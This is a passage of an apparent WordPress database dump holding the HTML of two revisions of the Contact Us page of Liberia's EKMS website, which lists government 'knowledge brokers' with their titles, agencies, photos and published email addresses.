src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 10:59:48','2022-09-20 10:59:48','',80,'https://ekmsliberia.info/?p=5095',0,'revision','',0),(5096,42,'2022-09-20 10:59:48','2022-09-20 10:59:48','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a 